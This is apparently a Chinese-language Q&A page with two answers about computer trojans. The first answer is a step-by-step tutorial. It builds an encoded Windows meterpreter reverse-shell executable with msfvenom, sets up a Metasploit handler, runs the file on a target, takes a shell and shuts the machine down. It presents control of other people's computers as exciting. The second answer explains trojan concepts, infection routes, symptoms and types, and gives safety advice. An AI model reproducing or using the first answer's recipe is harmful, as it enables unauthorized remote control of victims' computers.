2018-11-18 03:53:03 佚名

咔擦娛樂

瞭解過木馬或者病毒的人都知道木馬是個非常強大的工具，其中最讓人興奮的功能就是可以侵入別人的電腦，然後獲取該電腦的權限，得到權限之後電腦基本上就在你的掌控之中了。既然木馬如此強大，那必定會有好奇如此強大"神器"是如何被製作出來的呢？現在，小編就帶大家瞭解木馬的基本製作過程！

用kali系統集成的metasploit工具來製作木馬

1、打開kali系統，輸入【msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\\x00' LHOST= "執行攻擊的電腦的IP" LPORT= "端口號可自行設置，但不要設為已經固定的端口號" -f exe > abc.exe】命令。

出現下圖信息表示已經生成木馬，路徑位於根目錄下。

2、打開metasloit工具，輸入【use exploit/multi/handler】和【set payload windows/meterpreter/reverse_tcp】命令進行模塊的開啟與相關的配置。

3、在靶機上面打開生成的木馬

返回kali系統，查看反彈回來的信息。出現下圖表示木馬已經在靶機被打開了。

4、然後，就會自動進入到meterpreter模式，輸入shell命令，就會獲取靶機的shell權限，至此你已經獲取了控制這臺計算機的所有權限，前提是要你必要熟悉windows的DOS命令。

執行一個【shutdown -s】關機命令操作進行驗證！靶機提示系統即將關機！

到這裡我們已經完成了一個木馬從製作到實現入侵功能的基本操作，但是這只是一個比較初級的反彈型木馬，想要製作一些功能強大的木馬，還需要各位讀者自己深入研究，也非常歡迎讀者在評論區留言，我們共同討論，共同學習。

關注小編，我將定期為大家解答各類網絡安全的疑惑，並且為大家帶來網絡安全的實用技術。大家如果對網絡安全方面的問題也可以向小編提問，如果我知道的都會為大家竭力解答！

深度安全

作為一個從業十幾年的程序員來分析下計算機木馬原理，計算機木馬原來稱呼為特洛伊木馬，主要流傳於古希臘，攻城不對久攻不下，於是讓人專門製作了一個體積非常大的馬，把士兵裝進去然後攻城的時候故意仍在城牆邊上，結果城裡的人當成戰利品把木馬弄成城裡，結果半夜藏在裡面的士兵出來，偷偷把城門打開了，隨即把城池拿下，就是典型的特洛伊木馬案例，電腦的木馬原理和這個最接近。近些年發生在國內的大規模的木馬中毒事件，熊貓燒香病毒，就是典型的木馬入侵案例，木馬對計算機系統和網絡都有相當大的危害。

一個傳統意義上的木馬主要分成兩部分：服務器，控制器。服務器就是植入到電腦中的病毒，隨時聽候控制器的指示，一旦收到信號指令就是按照控制器的做法開始，最原始的做法是掃描可以使用的網絡端口，開啟一個端口方便控制器進入，一旦門口打開電腦裡面的所有隱私都會被收集到，至於破壞到什麼程度取決於控制者的個人需求。

當然一個木馬不可能正大光明就能進入到宿主機機器上，傳統的傳播途徑主要有文件下載，網頁文件下載，郵件附件，聊天過程中文件傳輸。經常下載文件的時候需要特別小心了，特別是有些男生經常下載一些影片，視頻裡面也有可能夾雜著木馬病毒，平時郵箱裡面看到的一些陌生郵件的附件或者網址不要輕易點開，可能在點開的瞬間你就中招了，陌生的文件不要輕易點開，確認文件安全之後才去點擊，因為木馬病毒即使當時點開侵入電腦之中不一定當時發作，需要等到控制器指令然後才開始行動，有些木馬的潛伏期相當長，平時藏得很深。

中了木馬有什麼直接的感覺，一般的木馬啟動之後，都會掃面電腦上文件，一般會導致電腦非常卡頓，而且會有無緣無故的黑屏或者重啟現象，硬盤燈一直處於閃動狀態，有時還會導致cpu佔有率非常高，一旦存在這種現象可能距離中毒不遠了，可以裝上殺毒軟件殺下毒。

常見的木馬都有什麼類型，木馬從程序角度理解應該屬於一個進程，畢竟時刻等待控制器指令，需要處於一直等待狀態上，能夠滿足這種一般是進程，最土的做法是自己建立一個進程，然後等待時機開始做事。但這種最容易被發現，比較先進一點的木馬會在利用dll，hook等方法現有進程裡面創建一個線程，同樣能達到創建進程的效果，這種對於急速要求也是最高的，當然有些木馬為了簡化功能，根本不存在控制器一旦入侵了計算機就開始做同樣的事情，這種屬於簡單廣告傳播或者盜取某些賬號密碼來使用，拿到某些結果直接通過郵件方式傳遞出去，還有一些木馬第一次植入不做任何的壞事，就是為了迎接下一次的密碼配合，為下一次的木馬做好充分的準備，在安全領域會有層出不窮的木馬製造者也有各種各樣的木馬檢測手段，無硝煙的戰爭無時無刻的在進行中。